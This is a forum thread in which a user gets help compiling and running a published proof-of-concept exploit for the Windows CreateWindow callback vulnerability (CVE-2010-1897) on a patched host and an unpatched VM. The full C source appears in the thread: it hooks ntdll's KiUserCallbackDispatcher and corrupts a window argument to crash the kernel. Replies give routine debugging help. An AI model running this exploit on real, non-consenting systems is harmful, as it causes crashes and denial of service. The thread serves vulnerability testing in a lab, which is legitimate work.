Compiling Microsoft Windows CreateWindow-Function Callback Vulnerability; CVE 2010-1897
Hello,
I tried to compile the CVE 2010-1897 vulnerability because I have to test how this affects my systems. Unfortunately I'm not as good in C++ as in .Net and other languages. I attatched the PoC-Code which can be found at http://www.coresecurity.com/content/microsoft-windows-createwindow-function-callback-bug .
I'm trying to compile the code with Visual Studio 2010 Professional. I already added the L to some strings in the function calls to solve the LPCWSTR-issue. So, now my problem:
* ( ( unsigned int * ) &trampoline [ 1 ] ) = ( unsigned int * ) handler;
In the IDE I get an error, telling me that I cannot attach a value of unsigned int * to an entity of unsigned int, but I can compile the code. If I try to run the programm it crashes at this line and the debugger is telling me that I can not write at the address where trampoline is in RAM.
Thanks,
samml
I tried to compile the CVE 2010-1897 vulnerability because I have to test how this affects my systems. Unfortunately I'm not as good in C++ as in .Net and other languages. I attatched the PoC-Code which can be found at http://www.coresecurity.com/content/microsoft-windows-createwindow-function-callback-bug .
I'm trying to compile the code with Visual Studio 2010 Professional. I already added the L to some strings in the function calls to solve the LPCWSTR-issue. So, now my problem:
* ( ( unsigned int * ) &trampoline [ 1 ] ) = ( unsigned int * ) handler;
In the IDE I get an error, telling me that I cannot attach a value of unsigned int * to an entity of unsigned int, but I can compile the code. If I try to run the programm it crashes at this line and the debugger is telling me that I can not write at the address where trampoline is in RAM.
Thanks,
samml
#include <windows.h>
#include <stdio.h>
#define asm __asm
///////////////////////////////////////////////////////////////////////////
void *KiUserCallbackDispatcher;
///////////////////////////////////////////////////////////////////////////
//__declspec ( naked ) void handler ( void );
void seter ( unsigned int * );
BOOL CALLBACK my_callback ( int , WPARAM , LPARAM );
///////////////////////////////////////////////////////////////////////////
char *trampoline = "\x68" // "push"
"\x12\x34\x56\x78" // "handler address"
"\xc3"; // "ret"
///////////////////////////////////////////////////////////////////////////
__declspec ( naked ) void handler ( void )
{
// asm int 3
asm pushad
asm push esp
asm call seter
asm add esp,4
asm popad
/* The first 3 "KiUserCallbackDispatcher" instructions */
asm add esp,0x4
asm pop edx
asm mov eax,fs:[0x18]
/* Returning to the normal code */
asm push dword ptr [ KiUserCallbackDispatcher ]
asm add dword ptr [esp],0x0a
asm ret
}
///////////////////////////////////////////////////////////////////////////
void seter ( unsigned int *base )
{
unsigned int *p = ( unsigned int * ) base;
static int time = 1;
/* If it's the correct call */
if ( time == 1 )
{
/* Searching a known argument */
while ( 1 )
{
/* If it's the interesting value */
if ( *p == 0x00cf0000 )
{
/* If it's the hParent to be modified */
if ( p [ 4 ] == 0 )
{
/* Writing the magic argument */
p [ 4 ] = 0xfffffffe; /* <<<<<<<< BUG <<<<<<<< */
/* Closing the door */
time ++;
}
/* Leaving */
break;
}
else
{
p ++;
}
}
}
else
{
time ++;
}
}
///////////////////////////////////////////////////////////////////////////
BOOL CALLBACK my_callback ( int algo , WPARAM wparam , LPARAM lparam )
{
return ( FALSE );
}
///////////////////////////////////////////////////////////////////////////
int main ( int argc , char *argv [] )
{
unsigned int nbytes;
unsigned int oldp;
HHOOK hook;
/* Resolving the KiUserCallbackDispatcher address */
KiUserCallbackDispatcher = GetProcAddress ( GetModuleHandle (
"ntdll.dll" ) , "KiUserCallbackDispatcher" );
printf ( "%x\n" , KiUserCallbackDispatcher );
/* Changing the privileges */
VirtualProtect ( KiUserCallbackDispatcher , 1 ,
PAGE_EXECUTE_READWRITE , &oldp );
/* Fixing the trampoline */
* ( ( unsigned int * ) &trampoline [ 1 ] ) = ( unsigned int * ) handler;
/* Patching the KiUserCallbackDispatcher */
WriteProcessMemory ( ( HANDLE ) -1 , ( void * )
KiUserCallbackDispatcher , ( void * ) trampoline , 6 , ( DWORD * )
&nbytes );
/* Enabling the kernel callbacks */
hook = SetWindowsHookEx ( WH_SHELL , ( HOOKPROC ) my_callback ,
GetModuleHandle ( NULL ) , GetCurrentThreadId () );
hook = SetWindowsHookEx ( WH_GETMESSAGE , ( HOOKPROC ) my_callback ,
GetModuleHandle ( NULL ) , GetCurrentThreadId () );
hook = SetWindowsHookEx ( WH_CBT , ( HOOKPROC ) my_callback ,
GetModuleHandle ( NULL ) , GetCurrentThreadId () );
/* Creating a window */
printf ( "Creating a Window ...\n" );
CreateWindow ( "Edit" , "Title" , WS_OVERLAPPEDWINDOW , 0 , 0 , 20 ,
30 , NULL , NULL , NULL , NULL );
printf ( "waiting the BSOD ...\n" );
return ( 0 );
}
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
I tried to run the program with OllyDbg in the VM. It says "Access violation while executing [000B0CAE]" before I see the EP.
>>But I had to change "ntdll.dll" in L"ntdll.dll". If I change "Edit" , "Title" in
>>L"Edit" , L"Title" it does not work.
Well, if you switch your project setting from UNICODE to MBCS you could use that without changing the string literals to UNICODE using the 'L' prefix.
'0xc0000005' is an acces violation. Mybe you could add some 'printf()' statements so you can see where exactly that occurs, e.g.
>>L"Edit" , L"Title" it does not work.
Well, if you switch your project setting from UNICODE to MBCS you could use that without changing the string literals to UNICODE using the 'L' prefix.
'0xc0000005' is an acces violation. Mybe you could add some 'printf()' statements so you can see where exactly that occurs, e.g.
/* Patching the KiUserCallbackDispatcher */
printf("Patching the KiUserCallbackDispatcher\n");
WriteProcessMemory ( ( HANDLE ) -1 , ( void * )
KiUserCallbackDispatcher , ( void * ) trampoline , 6 , ( DWORD * )
&nbytes );
/* Enabling the kernel callbacks */
printf("WH_SHELL\n");
hook = SetWindowsHookEx ( WH_SHELL , ( HOOKPROC ) my_callback ,
GetModuleHandle ( NULL ) , GetCurrentThreadId () );
printf("WH_GETMESSAGE\n");
hook = SetWindowsHookEx ( WH_GETMESSAGE , ( HOOKPROC ) my_callback ,
GetModuleHandle ( NULL ) , GetCurrentThreadId () );
printf("WH_CBT\n");
hook = SetWindowsHookEx ( WH_CBT , ( HOOKPROC ) my_callback ,
GetModuleHandle ( NULL ) , GetCurrentThreadId () );ASKER
>> So I added a print right after the variable declaration. I can not see this print in the VM.
I added a print right after the variable declaration.
unsigned int nbytes;
unsigned int oldp;
HHOOK hook;
printf("Variable declaration finished!\n\n");
/* Resolving the KiUserCallbackDispatcher address */
KiUserCallbackDispatcher = GetProcAddress ( GetModuleHandle (
L"ntdll.dll" ) , "KiUserCallbackDispatcher"
I can not see this printf. And I forgot: I get the error twice.
I think it hast to do something with the XP or the 64/32-bit. But I'm really sure that the exe is 32bit (ProcessExplorer says it while running and PEiD says it too)
I added a print right after the variable declaration.
unsigned int nbytes;
unsigned int oldp;
HHOOK hook;
printf("Variable declaration finished!\n\n");
/* Resolving the KiUserCallbackDispatcher address */
KiUserCallbackDispatcher = GetProcAddress ( GetModuleHandle (
L"ntdll.dll" ) , "KiUserCallbackDispatcher"
I can not see this printf. And I forgot: I get the error twice.
I think it hast to do something with the XP or the 64/32-bit. But I'm really sure that the exe is 32bit (ProcessExplorer says it while running and PEiD says it too)
Are you launching the program from the Explorer or from a command prompt? The latter would be the preferred method, enuring that the output is not lost. Also - is that a "First-chance Exception"? If so, it is not a problem at all...
ASKER
>> First-chance Exception
What is that?
I launched it from Explorer and from cmd. I didn't get any output with both methods.
What is that?
I launched it from Explorer and from cmd. I didn't get any output with both methods.
ASKER
If I run the program under 7x64 in debug mode I get an access violation in the line
*( ( unsigned int * ) &trampoline [ 1 ] ) = ( unsigned int ) handler;
*( ( unsigned int * ) &trampoline [ 1 ] ) = ( unsigned int ) handler;
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
Yes you are right. I already tried the []-thing, but I accidently used const char. Now it works. But why worked the const-char thing in the release-version.
Have you got any idea on the VMware problem?
Have you got any idea on the VMware problem?
Sorry to be a bit daft, but: What was the VMware problem again?
ASKER
The exe runs on my 7x64 which is fully patched. Because of that the exploit doesn't work on my 7x64, as it should be. But I want to experiment with the exploit on an unpatched, vulnerable system. I have a XPx32 machine in VMware. If I run the same exe in this VM now I get the two 0xc0000005 errors like I described above.
Ah, I thought that was fixed also? Can you try compiling that with VC++ Express in the VM and step through the code in the Debugger?
ASKER
Ok, I'm installing Visual Studio in the VM now....
ASKER
Now it works in the VM. I copied the MSVC-and-so-on-DLLs to the VM before (Yes, the ones from SysWOW64). But apparently they were somehow wrong. After I installed VS in the VM and deleted the DLLs it worked fine.
ASKER
Another question: I'm developing under Win 7x64, fully patched.
The program works fine there, but of corse I don't get the BSOD because it is patched.
I have an unpatched XPx32 in WMware and if I try to run the program there I get an 0xc0000005-error. So I added a print right after the variable declaration. I can not see this print in the VM. ProcessExplorer says that my process is 32bit. How can I get the program running in the VM?